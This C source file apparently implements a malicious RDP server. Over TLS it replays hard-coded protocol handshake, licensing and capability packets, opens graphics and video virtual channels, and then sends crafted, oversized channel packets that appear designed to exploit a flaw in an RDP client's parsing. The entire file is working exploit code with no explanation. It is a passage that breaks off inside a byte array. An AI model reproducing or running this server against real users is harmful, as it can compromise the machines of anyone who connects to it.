﻿
#include <winsock2.h>
#include <ws2tcpip.h>
#include <openssl/ssl.h>
#include <openssl/x509.h>
#include <openssl/err.h>

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <wininet.h>
#include <stdlib.h>
#include <stdint.h>



#pragma comment(lib,"ws2_32.lib") //Winsock Library
#pragma comment( lib, "wininet")



#define DEFAULT_BUFLEN 4096
static SOCKET ListenSocket = INVALID_SOCKET;
static SOCKET ClientSocket = INVALID_SOCKET;


static SSL_CTX * ctx;
static SSL * ssl = NULL;
HANDLE hr = NULL;

typedef uint8_t  u8;
typedef uint16_t u16;
typedef uint32_t u32;

const char *
$strerror(int err)
{
	static char* msg = NULL;
	switch (err) {
	default:
		if (msg == NULL)
			free(msg);
		FormatMessageA(
			FORMAT_MESSAGE_ALLOCATE_BUFFER |
			FORMAT_MESSAGE_FROM_SYSTEM |
			FORMAT_MESSAGE_IGNORE_INSERTS,
			NULL,
			err,
			MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
			(LPSTR)&msg,
			0, NULL);
		return msg;
		break;
	}
}

static void ssl_clear()
{
	if (ssl != NULL)
	{
		SSL_shutdown(ssl);
		SSL_free(ssl);
		ssl = NULL;
	}
	if (ClientSocket != INVALID_SOCKET)
	{
		closesocket(ClientSocket);
		ClientSocket = INVALID_SOCKET;
	}


}

static int ssl_recv_data(unsigned char *data, int data_length)
{
	int rcvd = 0;
	int ssl_err = 0;
	int erro = 0;
	int index = 0;

	while (data_length > 0)
	{
		rcvd = SSL_read(ssl, data, data_length);
		ssl_err = SSL_get_error(ssl, rcvd);
		int a = WSAGetLastError();
		if (ssl_err == SSL_ERROR_SSL)
		{
			if (SSL_get_shutdown(ssl) & SSL_RECEIVED_SHUTDOWN)
			{
				printf("Remote peer initiated ssl shutdown.\n");
				ssl_clear();
				return 0;
			}
			printf("ssl_err == SSL_ERROR_SSL\n");
			ssl_clear();
			return 0;
		}

		if (ssl_err == SSL_ERROR_WANT_READ || ssl_err == SSL_ERROR_WANT_WRITE)
		{
			rcvd = 0;
		}
		if (ssl_err != SSL_ERROR_NONE)
		{

			printf("UNKNOWN - SSL - network error\n");
			printf("ssl_err != SSL_ERROR_NONE\n");
			ssl_clear();
			return 0;
		}
		data_length -= rcvd;
	}

	return rcvd;
}

static  int respose_to_rdp_client(unsigned char *data, int data_length)
{
	int iSendResult = 0;

	iSendResult = SSL_write(ssl, data, data_length);

	if (iSendResult <= 0)
	{
		printf("SSL_write FAILD");
		// ERR_print_errors_fp(stdout);
		ssl_clear();
		return -1;
	}


	return 0;
}

static int ssl_recv_loop(unsigned char *recvbuf, unsigned char* channel)
{
	int index = 0;
	UINT8 version = 0;
	UINT16 data_length = 0;
	int iResult = 0;
	int i = 0;

	memset(recvbuf, 0, DEFAULT_BUFLEN);

	if (!ssl_recv_data(recvbuf, 4))
		return 0;


	version = recvbuf[index];
	if (version == 3)
	{
		index += 2;
		data_length = (recvbuf[index] << 8) | recvbuf[index + 1];
	}
	else if (version != 3)
	{
		index += 1;
		if (recvbuf[index] >= 0x80)
		{
			//index += 1;
			unsigned char data1 = recvbuf[index] - 0x80;
			data_length = (data1 << 8) | recvbuf[index + 1];
		}
		else
		{
			data_length = recvbuf[index];
		}
	}

	memset(recvbuf, 0, 4);

	iResult = ssl_recv_data(recvbuf, data_length - 4);


	if (version == 3)
	{
		*channel = recvbuf[7];
	}


	return iResult;
}

static int ssl_established()
{
	ssl = SSL_new(ctx);
	SSL_set_fd(ssl, ClientSocket);

	if (SSL_accept(ssl) <= 0)
	{
		printf("sslssl_u_stdw_clear\n");
		ssl_clear();
		return -1;
	}
	else
	{
		return 0;
	}
}

int start_establish()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int recvbuflen = DEFAULT_BUFLEN;
	unsigned char name_respose[] = { 0x3,0,0,0x13,0xe,0xd0,0,0,0x12,0x34,0,0x2,0x1,0x8,0,0x1,0,0,0 };

	int i = 0;
	int iSendResult = 0;
	int iRecvResult = 0;
	iRecvResult = recv(ClientSocket, (char*)recvbuf, recvbuflen, 0);

	if (iRecvResult > 0)
	{


		iSendResult = send(ClientSocket, (const char*)name_respose, 19, 0);
		if (iSendResult == SOCKET_ERROR) {
			printf("send failed with error: %d\n", WSAGetLastError());
			closesocket(ClientSocket);
			WSACleanup();
			return -1;
		}


		return 0;
	}
	else
	{
		printf("start establish failed!\n");
		return -1;
	}
}

static int recv_loop()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int iResult = 0;

	u8 version = 0;;
	u16 data_length = 0;
	unsigned char channel = 0;
	unsigned char mcs_connect[] = {
		0x03,00,
		00,0x7e,
		0x02,0xf0,0x80,0x7f,0x66,0x74,0x0a,0x01,00,0x02,0x01,00,0x30,0x1a,0x02,0x01,0x22,0x02,0x01,0x03,0x02,0x01,00,0x02,0x01,0x01,0x02,0x01,00,0x02,0x01,0x01,0x02,0x03,00,0xff,0xf8,0x02,0x01,0x02,0x04,0x50,00,0x05,00,0x14,0x7c,00,0x01,0x2a,0x14,0x76,0x0a,0x01,0x01,00,0x01,0xc0,00,0x4d,0x63,0x44,0x6e,0x3a,0x01,0x0c,0x10,00,0x0c,00,0x08,00,0x03,00,00,00,0x04,00,00,00,0x03,0x0c,0x10,00,0xeb,0x03,0x04,00,0xec,0x03,0xed,0x03,0xee,0x03,0xef,0x03,0x02,0x0c,0x0c,00,00,00,00,00,00,00,00,00,0x04,0x0c,0x06,00,0xf0,0x03,0x08,0x0c,0x08,00,00,00,00,00 
	};

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect, 126);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	unsigned char mcs_connect_id[] = { 0x03,00,00,0x0b,0x02,0xf0,0x80,0x2e,00,00,0x08 };
	unsigned char mcs_connect_channel_1[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xf1,0x03,0xf1 };
	unsigned char mcs_connect_channel_2[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xeb,0x03,0xeb };
	unsigned char mcs_connect_channel_3[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xf0,0x03,0xf0 };
	unsigned char mcs_connect_channel_4[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xec,0x03,0xec };
	unsigned char mcs_connect_channel_5[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xed,0x03,0xed };
	unsigned char mcs_connect_channel_6[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xee,0x03,0xee };
	unsigned char mcs_connect_channel_7[] = { 0x03,00,00,0x0f,0x02,0xf0,0x80,0x3e,00,00,0x08,0x03,0xee,0x03,0xef };
	respose_to_rdp_client(mcs_connect_id, 11);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_1, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_2, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_3, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_4, 15);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_5, 15);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_6, 15);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_7, 15);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	unsigned char license_mcs_send[] = { 0x03,00,00,0x22,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x14,0x80,00,00,00,0xff,0x03,0x10,00,0x07,00,00,00,0x02,00,00,00,0x04,00,00,00 };
	respose_to_rdp_client(license_mcs_send, 34);
	
	unsigned char server_license[] = { 0x03,00,0x01,0xd8,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x81,0xc9,0xc9,0x01,0x11,00,0xea,0x03,0xea,0x03,0x01,00,0x04,00,0xb3,0x01,0x52,0x44,0x50,00,0x11,00,00,00,0x09,00,0x08,00,0xea,0x03,00,00,0x01,00,0x18,00,0x01,00,0x03,00,00,0x02,00,00,00,00,0x1d,0x04,00,00,00,00,00,00,0x01,0x01,0x14,00,0x0c,00,0x02,00,00,00,0x40,0x06,00,00,0x0a,00,0x08,00,0x06,00,00,00,0x08,00,0x0a,00,0x01,00,0x19,00,0x19,00,0x1b,00,0x06,00,0x03,00,0x0e,00,0x08,00,0x01,00,00,00,0x02,00,0x1c,00,0x20,00,0x01,00,0x01,00,0x01,00,00,0x04,00,0x03,00,00,0x01,00,0x01,00,00,0x1e,0x01,00,00,00,0x1d,00,0x60,00,0x04,0xb9,0x1b,0x8d,0xca,0x0f,00,0x4f,0x15,0x58,0x9f,0xae,0x2d,0x1a,0x87,0xe2,0xd6,00,0x03,00,0x01,0x01,0x03,0x12,0x2f,0x77,0x76,0x72,0xbd,0x63,0x44,0xaf,0xb3,0xb7,0x3c,0x9c,0x6f,0x78,0x86,00,0x04,00,00,00,00,00,0xa6,0x51,0x43,0x9c,0x35,0x35,0xae,0x42,0x91,0x0c,0xcd,0xfc,0xe5,0x76,0x0b,0x58,00,0x04,00,00,00,00,00,0xd4,0xcc,0x44,0x27,0x8a,0x9d,0x74,0x4e,0x80,0x3c,0x0e,0xcb,0xee,0xa1,0x9c,0x54,00,0x04,00,00,00,00,00,0x03,00,0x58,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x40,0x42,0x0f,00,0x01,00,0x14,00,00,00,0x01,00,00,00,0xaa,00,0x01,0x01,0x01,0x01,0x01,00,00,00,0x01,00,00,0x01,00,00,00,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,00,0x01,0x01,0x01,0x01,00,00,00,00,0xa1,0x06,0x06,00,0x40,0x42,0x0f,00,0x40,0x42,0x0f,00,0x01,00,00,00,00,00,00,00,0x12,00,0x08,00,0x01,00,00,00,0x0d,00,0x58,00,0x75,0x03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x17,00,0x08,00,0xff,00,00,00,0x18,00,0x0b,00,0x02,00,00,00,0x03,0x0c,00,0x1a,00,0x08,00,0x2b,0x48,0x09,00,0x1c,00,0x0c,00,0x52,00,00,00,00,00,00,00,0x1e,00,0x08,00,00,00,00,00,00,00,00,00 };
	respose_to_rdp_client(server_license, 472);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	

	unsigned char b1[] = { 0x03,00,00,0x24,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x16,0x16,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x16,00,0x1f,00,00,00,0x01,00,00,00 };
	unsigned char b2[] = { 0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x04,00,00,00,00,00,00,00 };
	unsigned char b3[] = { 0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x02,00,0xf1,0x03,0xea,0x03,00,00 };
	unsigned char b4[] = { 0x3,0,0,0x28,0x2,0xf0,0x80,0x68,0,0x1,0x3,0xeb,0x70,0x1a,0x1a,0,0x17,0,0xea,0x3,0xea,0x3,0x1,0,0,0x1,0x1a,0,0x28,0,0x1a,0,0,0,0,0,0x3,0,0x4,0 };
	unsigned char b5[] = { 0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x28,00,00,00,00,00,00,00,0x03,00,0x04,00 };
	respose_to_rdp_client(b1, 36);
	respose_to_rdp_client(b2, 40);
	respose_to_rdp_client(b3, 40);
	
	respose_to_rdp_client(b4, 40);
	respose_to_rdp_client(b5, 40);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	unsigned char c1[] = { 0x03,00,00,0x22,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x14,0x0c,00,00,00,0x03,00,00,00,0x50,00,0x03,00,0x33,0x33,0x11,0x11,0x3d,0x0a,0xa7,0x04 };
	unsigned char c2[] = { 0x03,00,00,0x3b,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x2d,0x25,00,00,00,0x03,00,00,00,0x18,0x03,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x3a,0x3a,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x3a,0x3a,0x52,0x44,0x53,0x3a,0x3a,0x54,0x65,0x6c,0x65,0x6d,0x65,0x74,0x72,0x79,00 };
	unsigned char c3[] = { 0x03,00,00,0x3a,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x2c,0x24,00,00,00,0x03,00,00,00,0x18,0x07,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x3a,0x3a,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x3a,0x3a,0x52,0x44,0x53,0x3a,0x3a,0x47,0x72,0x61,0x70,0x68,0x69,0x63,0x73,00 };
	respose_to_rdp_client(c1, 34);
	respose_to_rdp_client(c2, 59);
	respose_to_rdp_client(c3, 58);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	unsigned char cd1[] = { 0x03,00,00,0x29,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x1b,0x13,00,00,00,0x03,00,00,00,0x38,0x07,0xe0,0x24,0x09,0xe3,0x18,0x0a,0x44,0x8c,0x70,0xe9,0x8d,0xd1,0x40,0x45,0x8c,0x60,0x02 };
	
	unsigned char cd2[] = { 0x03,00,00,0x48,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x3a,0x32,00,00,00,0x03,00,00,00,0x18,0x09,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x3a,0x3a,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x3a,0x3a,0x52,0x44,0x53,0x3a,0x3a,0x56,0x69,0x64,0x65,0x6f,0x3a,0x3a,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x3a,0x76,0x30,0x38,0x2e,0x30,0x31,00};
	unsigned char cd3[] = { 0x03,00,00,0x45,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x37,0x2f,00,00,00,0x03,00,00,00,0x18,0x0a,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x3a,0x3a,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x3a,0x3a,0x52,0x44,0x53,0x3a,0x3a,0x56,0x69,0x64,0x65,0x6f,0x3a,0x3a,0x44,0x61,0x74,0x61,0x3a,0x3a,0x76,0x30,0x38,0x2e,0x30,0x31,00 };
	unsigned char cd4[] = { 0x03,00,00,0x42,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x34,0x2c,00,00,00,0x03,00,00,00,0x18,0x0b,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x3a,0x3a,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x3a,0x3a,0x52,0x44,0x53,0x3a,0x3a,0x47,0x65,0x6f,0x6d,0x65,0x74,0x72,0x79,0x3a,0x3a,0x76,0x30,0x38,0x2e,0x30,0x31,00 };
	unsigned char cd5[] = { 0x03,00,00,0x43,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x35,0x2d,00,00,00,0x03,00,00,00,0x38,0x07,0xe0,0x24,0x07,0x45,0x02,0xa6,0x62,0x54,0x63,0x1a,0xe3,0x11,0x5c,0x45,0xc8,0x8e,0x76,0x8c,0x1b,0x69,0x1a,0x6d,0x8c,0x45,0xbf,0xc4,0x5d,0x66,0x9e,0x04,0x22,0x44,0x47,0x13,0x58,0x47,0xe4,0x52,0x89,0x22,0x2c,0x80,0x04 };
	respose_to_rdp_client(cd1, 41);
	respose_to_rdp_client(cd2, 72);
	respose_to_rdp_client(cd3, 69);
	respose_to_rdp_client(cd4, 66);
	respose_to_rdp_client(cd5, 67);
	//if (!ssl_recv_loop(recvbuf, &channel))
		//return 0;

	unsigned char hexData[26] = {
		0xE0, 0x1E, 0x05, 0x00, 0x57, 0x17, 0xF4, 0x7F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x02,
		0x00, 0x00, 0x1D, 0x02, 0x08, 0xA4, 0x02, 0x00, 0x00, 0xA4
	};

	unsigned char cd6[] = { 0x03,00,0x03,0x34,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x83,0x25,0x1d,0x03,00,00,0x03,00,00,00,0x30,0x07,0xe0,0x24,0xe7,0x16,0x01,0xf1,0x22,0x23,0x6e,0xc6,0xa2,0x10,0xbc,0x50,0x0e,0x44,0x88,0x8f,0x59,0xba,0xe6,0x49,0xf6,0x9b,0x99,0x38,0x9c,0x86,0x24,0x27,0x19,0x2d,0x8c,0x63,0xe4,0x44,0xe1,0x1a,0x24,0x92,0x89,0x60,0xfe,0x46,0x46,0xca,0x4d,0x1b,0xea,0x43,0xa2,0x3c,0xae,0x31,0xe0,0x25,0x12,0x23,0x28,0xcc,0x86,0x31,0x88,0xcb,0x6f,0xb1,0xe2,0x32,0xd9,0x81,0x19,0x70,0xe3,0x32,0x2d,0xc1,0xf2,0x57,0x52,0x2d,0xb7,0xd8,0xcb,0x85,0x81,0x22,0xdc,0x38,0x96,0x54,0x8b,0x6d,0xf2,0x32,0xe1,0xfb,0xa4,0x8b,0x70,0x30,0x34,0x94,0xce,0x0c,0x4f,0xee,0x92,0x8d,0xf5,0x91,0x6e,0x0f,0xba,0xc8,0xb7,0x03,0x02,0x45,0xb8,0x66,0x82,0x48,0xb6,0xf3,0x57,0x44,0x9d,0x6d,0xf6,0x69,0x44,0x65,0xb3,0x02,0x45,0xb8,0x71,0x9f,0x93,0x5b,0x6f,0xf2,0x32,0xe1,0xfb,0x99,0x16,0xe0,0x60,0x48,0x27,0x0e,0x34,0x92,0x8e,0x18,0xcb,0x87,0xee,0x92,0x51,0xc3,0xa4,0x94,0x70,0xeb,0x25,0x1c,0x31,0x97,0x0f,0xdd,0x64,0xa3,0x87,0x59,0x28,0xe1,0xc7,0xd9,0x8e,0x38,0x23,0x2e,0x1f,0xb8,0xfb,0x25,0x1c,0x12,0x09,0xc3,0x8c,0xc9,0x47,0x0e,0x64,0x5b,0x83,0xee,0x7e,0xca,0xf6,0xec,0x09,0x16,0xe1,0xc6,0x92,0x51,0xc3,0xa4,0x94,0x70,0xe9,0x25,0x1c,0x32,0x2d,0xc3,0x8d,0x64,0xa3,0x87,0x59,0x28,0xe1,0xd6,0x4a,0x38,0x64,0x5b,0x87,0x18,0x60,0x4d,0x01,0xc2,0xc0,0x92,0x8e,0x09,0x04,0xe1,0x60,0x46,0x5c,0x38,0xcc,0x8b,0x70,0x7c,0xcb,0x02,0x57,0xb7,0xfb,0x99,0x4c,0xe0,0x60,0x46,0x5c,0x38,0xd2,0x4a,0x38,0x74,0x92,0x8e,0x1d,0x24,0xa3,0x86,0x32,0xe1,0xc6,0xb2,0x51,0xc3,0xac,0x94,0x70,0xeb,0x25,0x1c,0x31,0x97,0x0d,0x1a,0x96,0x64,0xa3,0x7c,0x63,0x34,0x2b,0xb6,0xa3,0xc0,0x8c,0xb7,0x60,0x48,0xb7,0x0d,0x3f,0x44,0x82,0x6f,0x47,0x81,0x19,0x6f,0xf7,0x32,0x2d,0xc0,0xc0,0xcc,0xa6,0x70,0x51,0xe0,0x48,0xb6,0xff,0x34,0x91,0x6e,0x0f,0xba,0x48,0xb7,0x03,0x03,0x49,0x28,0xe1,0xd6,0x45,0xb8,0x3e,0x6b,0x22,0xdc,0x1f,0x75,0x91,0x6e,0x06,0x04,0x8b,0x70,0xd1,0xe0,0x4b,0x87,0x06,0x3e,0x46,0x5b,0xd1,0xe0,0x48,0xb6,0xec,0x09,0x04,0xe1,0xa3,0xc0,0x91,0x6d,0xfe,0x66,0x45,0xb8,0x3e,0xc6,0x5c,0x2c,0x08,0xcb,0x86,0x8f,0x02,0x4a,0x38,0x34,0xf9,0x9a,0x3c,0x1c,0x32,0x2d,0xbb,0x02,0x32,0xe1,0xc6,0xb3,0x13,0x70,0x7c,0x8c,0x94,0x78,0x38,0x64,0x5b,0x76,0x04,0x65,0xc3,0x8c,0x7d,0x97,0x0e,0x08,0xc9,0x47,0x83,0x86,0x45,0xb7,0x60,0x48,0x27,0x0d,0x1e,0x06,0x68,0xf0,0x70,0xc8,0xb6,0xff,0x63,0x2e,0x16,0x04,0x65,0xc3,0x47,0x81,0x2e,0x1c,0x1a,0x4c,0x05,0xc1,0xf7,0x49,0x16,0xe0,0x60,0x46,0x5c,0x34,0x78,0x12,0x51,0xc1,0xac,0x94,0x70,0xeb,0x22,0xdc,0x0c,0x08,0xcb,0x86,0x8f,0x02,0x4a,0x38,0x30,0xc0,0x8c,0xb7,0xfb,0x86,0x04,0x8b,0x6f,0x47,0x81,0x20,0x9b,0xe3,0x32,0x2d,0xc1,0xf3,0x32,0x2d,0xc1,0xf6,0x32,0xe1,0x60,0x46,0x5c,0x38,0xd2,0x4a,0x38,0x63,0x2e,0x1f,0xba,0x48,0xb7,0x03,0x02,0x32,0xe1,0xc6,0xb2,0x51,0xc3,0x19,0x70,0xfd,0xd6,0x45,0xb8,0x18,0x11,0x97,0x0d,0x1e,0x06,0x94,0x73,0xb6,0xf9,0x8c,0x46,0x5b,0xd1,0xe0,0x69,0x22,0xdb,0x54,0x98,0x12,0x09,0xbd,0x1e,0x04,0x65,0xbf,0xcc,0xc8,0xb7,0x05,0x49,0x81,0x20,0x9b,0xd1,0xe0,0x46,0x5b,0xe3,0x49,0x16,0xe0,0xf9,0xa4,0x8b,0x70,0x7d,0xd2,0x60,0x2e,0x06,0x04,0x8b,0x70,0xd4,0x98,0x12,0x75,0xbf,0xcd,0x64,0x5b,0x83,0xee,0xb2,0x2d,0xc0,0xc0,0xd6,0x53,0x38,0x28,0xf0,0x24,0xa3,0x83,0x1f,0x24,0x5b,0x7a,0x3c,0x09,0x04,0xde,0x8f,0x02,0x32,0xdf,0x19,0x91,0x6e,0x0f,0x91,0x97,0x0f,0xd8,0xcb,0x85,0x81,0x19,0x70,0xd1,0xe0,0x49,0xd6,0xff,0x34,0xf9,0xa5,0x1e,0x0e,0x19,0x16,0xdd,0x81,0x19,0x70,0xd1,0xe0,0x49,0x47,0x06,0xbf,0x34,0xa3,0xc1,0xc3,0x22,0xdb,0xb0,0x23,0x2e,0x1a,0x3c,0x09,0x28,0xe0,0xc7,0xdd,0x28,0xf0,0x70,0xc8,0xb6,0xf4,0x78,0x12,0x2d,0xbd,0x1e,0x06,0x94,0x78,0x38,0x64,0x5b,0x7f,0xb1,0x97,0x0b,0x02,0x32,0xe1,0xa3,0xc0,0x93,0xad,0xfe,0x69,0xf7,0x4a,0x3c,0x1c,0x32,0x2d,0xbb,0x02,0x32,0xe1,0xa3,0xc0,0x92,0x8e,0x0d,0x7e,0xe9,0x47,0x83,0x86,0x45,0xb7,0x60,0x46,0x5c,0x34,0x78,0x12,0x51,0xc1,0x86,0x06,0x94,0x78,0x38,0x64,0x5b,0x7a,0x3c,0x09,0x16,0xde,0x8f,0x03,0x4a,0x3c,0x1c,0x32,0x2d,0xbf,0xd8,0xcb,0x85,0x81,0x19,0x70,0xd1,0xe0,0x49,0xd6,0xff,0x34,0x60,0x69,0x47,0x83,0x86,0x45,0xb7,0x60,0x46,0x5c,0x34,0x78,0x12,0x51,0xc1,0xab,0x03,0x4a,0x3c,0x1c,0x32,0x2d,0xbb,0x02,0x41,0x15,0x74,0x58,0x89,0x22,0xac,0x6e,0xc0,0x03 };
	unsigned char cd7[] = { 0x03,00,0x04,0x23,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xef,0xf0,0x84,
		0x14,0x0c,0x04,00,00,0x03,00,00,00,0x30,0x07,
		0xE0, 0x1E, 0x05, 0x00, 0x57, 0x17, 0xF4, 0x7F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x02,
		0x00, 0x00, 0x1D, 0x02, 0x08, 0xA4, 0x02, 0x00, 0x00, 0xA4,
		0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
		0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
